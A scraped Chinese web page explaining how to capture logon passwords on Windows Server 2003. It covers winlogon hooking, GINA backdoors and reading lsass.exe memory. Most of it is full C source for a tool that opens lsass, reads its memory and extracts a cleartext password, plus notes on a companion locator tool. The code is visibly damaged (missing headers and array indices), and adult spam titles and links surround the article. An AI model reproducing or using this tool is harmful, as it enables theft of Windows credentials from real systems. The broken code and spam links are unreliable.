色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

您好,歡迎來電子發燒友網! ,新用戶?[免費注冊]

您的位置:電子發燒友網>電子百科>電腦硬件>服務器>

如何在win 2003中得到登陸密碼

2010年01月29日 11:45 www.1cnz.cn 作者:佚名 用戶評論(0
關鍵字:Win 2003(6429)

如何在win 2003中得到登陸密碼

在所有NT系統中,都是有幾種方法可以得到登陸用戶的密碼的。我知道的三種方法可以達到目的。

   1.hook了winlogon中幾個函數,網上也有這類型的程序,叫winlogonhijack的項目在rootkit.com中有提供,不過那個項目只對本地登陸用戶有效,遠程登陸用戶無效。
  2.使用Gina和winlogon進行套接,只要對某些函數執行自己的記錄密碼的代碼,就可以將密碼記錄下來,穩定性高,而且對本地或遠程登陸都有效,不過現存的gina后門程序在XP或2003中都有些函數沒有被導出過,主要因為xp和2003等在winlogon中加入了新的函數。

  3.直接讀取內存數據得到明文密碼。在NT 4.0/2K中,早就有程序findpass可以直接讀到winlogon進程中的內存數據而直接得到登陸用戶密碼,因為在NT4.0和2K中,帳號的信息,包括域名,帳號和密碼都是有規律地在winlogon內存中的特定地址中,所以可以很簡單就得到。但在XP和2003系統中,這樣方法是無效的了,似乎我們是沒有辦法直接讀出明文地址了。下面我們就來談談如何象findpass在NT 4.0和2K在,在server 2003中得到登陸用戶的密碼。

  雖然XP和2003是不象以前的NT系統那樣將登陸用戶信息保存在winlogon進程的內存地址內,但是基Lsass進程對于要處理些信息時,需要得到明文的登陸用戶密碼,所以登陸用戶的密碼會在Lsass進程中出現(微軟沒有將密碼在Lsass進程中進行加密,微軟的說法是因為Lsass需要得到明文的密碼,就算將密碼加密,也都只能用可逆的方法加密,只要跟蹤lsass的操作,一樣可以得到明文密碼,所以微軟使用了比較懶惰的方法,可能也是為了加快響應速度,所以將明文密碼更是放在lsass進程內存內)。說到這里,大家心里都清楚了,登陸用戶的密碼是在lsass進程的內存中。對,就是這么一回事,但是要得到這個明文密碼,真是象使用NT 4.0和2K下的findpass那樣容易嗎?事實上并不是那么容易,因為以下幾個原因:

  A.密碼存放在lsass進程中的內存地址是沒有規律的

  B.密碼有可能被最后登陸的用戶復蓋(例如管理員abc從本地登陸,然后管理員bbb從遠程登陸,然后管理員bbb注銷終端,存放在lsass.exe進程內存中的密碼,還是管理員bbb的密碼),又或者用戶登陸后,然后注銷了,那么我們就算得到了密碼,也不知道是哪個用戶的密碼。

  C.密碼前后的數據也是沒有規律的,如果有規律,例如密碼前的數據,一定是有一段全是01字符的數據段,那么定位密碼就簡單。

  原因A和C都給我們帶來定位密碼的困難,原B就帶來不能確定密碼和帳號對應的問題.看來微軟在新的系統還是做過點功夫。不過我們是不會放棄的,就算是碰碰運氣,也看能不能得到密碼,反正就算失敗,也沒什么關系。

  最后的代碼,是我寫來測試是不是能在2003的系統中得到登際用戶的密碼,結果也正好象我們上面的分析一樣(當然了,上面的結果是用這程序測測得到的)。成功率當然不高,因為受太多原因所影響,定位密碼上的困難或者無法定位,或者得到不是密碼的信息等等的原因,都令失敗率顯得相當高,不過總還是一種方法,或者將來有人可以準確定位到,那就是令人高興了。雖然說失敗率高,但在一種情況下,成功率卻是很高的,那就是管理員只是在本地或終端中登陸了,以后再沒有用戶從本地或終端登陸過,而且管理員也沒有鎖上過系統,那么成功率就會是相當高的了。

  提高成功率的兩種做法:

  1.程序直接寫成服務,定時檢查本地或遠程登陸(其實沒什么分別),當檢測到登陸后,去搜索lsass進程內存,嘗試得到密碼。
  
  2.程序模擬一個登陸(使用LogonUser()就能搞定),因為使用LogonUser()這個API,你要提供帳號名和對應的正確的密碼,才可以成功,然后你就可以去搜索lsass進程內存。因為知道密碼是什么,我們就能定位到密碼是保存在什么地方。因為登陸用戶的密碼都是保存在同一個地址或相離不遠的地址中,模擬登陸和搜索,可以先定位以后登陸的用戶的密碼會大約保存在什么位置。

  無論怎說,三種方法中,最穩定,最安全的方法還是使用Gina那種方法.Hijack了winlogn一些API的方法,畢竟是改動了系統的東西,對系統的穩定性來說,會有考驗,直接搜索lsass進程內存的方法呢,雖說也是困難,但準確性,成功率卻又是低。

  下面的代碼使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass內存中"LocalSystem Remote Procedure"這個字符串,因為在相當多的測試中,密碼都是保存在有這個字符串的地址后一點的位置中,當然了,很多系統并沒有這個字符串,或者就算有,我們得到的都是錯誤的密碼。

  代碼: //*************************************************************
  // Version: V1.0
  // Coder: WinEggDrop
  // Date Release: 12/15/2004
  // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
  // Used Is Pretty Unwise,But This May Be The Only Way To Review The
  // Logon User's Password On Windows 2003.
  // Test PlatForm: Windows 2003
  // Compiled On: VC++ 6.0
  //*************************************************************
  #include
  #include
  #include

  #define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

  char Password[MAX_PATH] = ; // Store The Found Password

  // Function ProtoType Declaration
  //------------------------------------------------------------------------------------------------------
  BOOL FindPassword(DWORD PID);
  int Search(char *Buffer,const UINT nSize);
  DWORD GetLsassPID();
  BOOL Is2003();
  //------------------------------------------------------------------------------------------------------
  // End Of Fucntion ProtoType Declaration

  int main()
  {
  DWORD PID = 0;
  printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

  if (!Is2003()) // Check Out If The Box Is 2003
  {
   printf("The Program Can't Only Run On Windows 2003 Platform\n");
   return -1;
  }

  PID = GetLsassPID(); // Get The Lsass.exe PID

  if (PID == 0) // Fail To Get PID If Returning Zerom
  {
   return -1;
  }

  FindPassword(PID); // Find The Password From Lsass.exe Memory
  return 0;
  }
  // End main()

  //------------------------------------------------------------------------------------
  // Purpose: Search The Memory & Try To Get The Password
  // Return Type: int
  // Parameters:
  // In: char *Buffer --> The Memory Buffer To Search
  // Out: const UINT nSize --> The Size Of The Memory Buffer
  // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
  // Since The Password Is Near The Above Location,But It's Not Always True That
  // We Will Find The Magic String,Or Even We Find It,The Password May Be Located
  // At Some Other Place.We Only Look For Luck
  //------------------------------------------------------------------------------------
  int Search(char *Buffer,const UINT nSize)
  {
  UINT OffSet = 0;
  UINT i = 0;
  UINT j = 0 ;
  UINT Count = 0;
  if (Buffer == NULL)
  {
   return -1;
  }
  for (i = 0 ; i < nSize ; i++)
  {
   /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
   Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
   The Magic String,We Have To Do It Manually And Slowly
   */
   if (Buffer == 'L')
   {
   OffSet = 0;
   if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
   {
   OffSet += strlen("LocalSystem") + 1;
   if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
   {
   OffSet += strlen("Remote") + 1;
   if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
   {
   OffSet += strlen("Procedure") + 1;
   if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
   {
   i += OffSet;
   break;
   }
   }
   }
   }
   }
  }
  if (i < nSize)
  {
   ZeroMemory(Password,sizeof(Password));
   for (; i < nSize ; i++)
   {
   if (Buffer == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
   {
   /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
   That Way
   */
   j = i + 7;
   for (; j < nSize; j += 2)
   {
   if (Buffer[j] > 0)
   {
   Password[Count++] = Buffer[j];
   }
   else
   {
   break;
   }
   }
   return i + 7; // One Flag To Indicate We Find The Password
   }
   }
  }
  return -1; // Well,We Fail To Find The Password,And This Always Happens
  }
  // End Search

  //------------------------------------------------------------------------------------
  // Purpose: To Get The Lsass.exe PID
  // Return Type: DWORD
  // Parameters: None
  //------------------------------------------------------------------------------------
  DWORD GetLsassPID()
  {
  HANDLE hProcessSnap;
  HANDLE hProcess = NULL;
  PROCESSENTRY32 pe32;
  DWORD PID = 0;

  hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if( hProcessSnap == INVALID_HANDLE_VALUE )
  {
   printf("Fail To Create Snap Shot\n");
   return 0;
  }

  pe32.dwSize = sizeof(PROCESSENTRY32);

  if( !Process32First(hProcessSnap, &pe32))
  {
   CloseHandle(hProcessSnap); // Must clean up the snapshot object!
   return 0;
  }

  do
  {
   if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
   {
   PID = pe32.th32ProcessID;
   break;
   }
  }while(Process32Next( hProcessSnap, &pe32));

  CloseHandle( hProcessSnap);
  return PID;
  }
  // End GetLsassPID()

  //------------------------------------------------------------------------------------
  // Purpose: To Find The Password
  // Return Type: BOOLEAN
  // Parameters:
  // In: DWORD PID -> The Lsass.exe's PID
  //------------------------------------------------------------------------------------
  BOOL FindPassword(DWORD PID)
  {
  HANDLE hProcess = NULL;
  char Buffer[5 * 1024] = ;
  DWORD ByteGet = 0;
  int Found = -1;

  hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
  if (hProcess == NULL)
  {
   printf("Fail To Open Process\n");
   return FALSE;
  }

  if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe
  {
   printf("Fail To Read Memory\n");
   CloseHandle(hProcess);
   return FALSE;
  }

  CloseHandle(hProcess);
  
  Found = Search(Buffer,ByteGet); // Search The Password
  if (Found >= 0) // We May Find The Password
  {
   if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
   {
   printf("Found Password At #0x%x -> "%s"\n",Found + BaseAddress,Password);
   }
  }
  else
  {
   printf("Fail To Find The Password\n");
  }
  return TRUE;
  }
  // End FindPassword

  //------------------------------------------------------------------------------------
  // Purpose: Check If The Box Is Windows 2003
  // Return Type: BOOLEAN
  // Parameters: None
  //------------------------------------------------------------------------------------
  BOOL Is2003()
  {
  OSVERSIONINFOEX osvi;
  BOOL b0sVersionInfoEx;
  ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
  osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

  if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
  {
   osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
  }
  return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
  }
  // End Is2003()
  // End Of File

  附件程序相當于密碼定位程序,用來測試在lsass內存中搜索指定的字符串或模擬登陸的密碼.

  用法:

  1.locator 字符串 -> 在lsass進程內存中搜索指定的那個"字符串",返回確定的位置

  2.Locator 用戶名 密碼 -> 在系統中建立一個參數指定的用戶,并進行模擬登陸,然后搜索"密碼"在lsass進程內存中的位置,生成的帳戶程序運行完后會自動刪除。

非常好我支持^.^

(0) 0%

不好我反對

(0) 0%

( 發表人:admin )

      發表評論

      用戶評論
      評價:好評中評差評

      發表評論,獲取積分! 請遵守相關規定!

      ?
      主站蜘蛛池模板: 免费人成视频19674不收费| 色欲国产麻豆精品AV免费| 无码国产欧美日韩精品| 国产99r视频精品免费观看| 毛片免费观看的视频| 最近日本MV字幕免费观看视频| 精品视频久久久久| 一二三四免费中文在线1| 果冻传媒视频在线观看完整版免费 | 桃隐社区最新最快地址| 二色AV天堂在线| 亚洲AV蜜桃永久无码精品红樱桃| 国产啪精品视频网免费| 午夜宅宅伦电影网| 老色哥网站| chinese极品嫩模videos| 欧美残忍xxxx极端| 国产精品欧美亚洲| 艳鉧动漫片1~6全集在线| 久久久97丨国产人妻熟女| 99热久久这里只有精品视频| 暖暖 视频 免费 高清 在线观看| 高清撒尿hdtube撒尿| A国产一区二区免费入口| 97人妻中文字幕免费视频| 琪琪电影午夜理论片YY6080| 成人a毛片久久免费播放| 无修肉动漫在线观看影片| 久久亚洲A片COM人成A| 国产精品久人妻精品| 国产成人99久久亚洲综合精品| 欲香欲色天天天综合和网| 欧美视频 亚洲视频| 精品免费久久久久久影院| 久久精品视在线-2| 啊…嗯啊好深男男高h文总受| 久久精品热99看| 成片免费观看视频大全| av淘宝 在线观看| 扒开她的黑森林让我添动态图| 被滋润的艳妇疯狂呻吟白洁老七|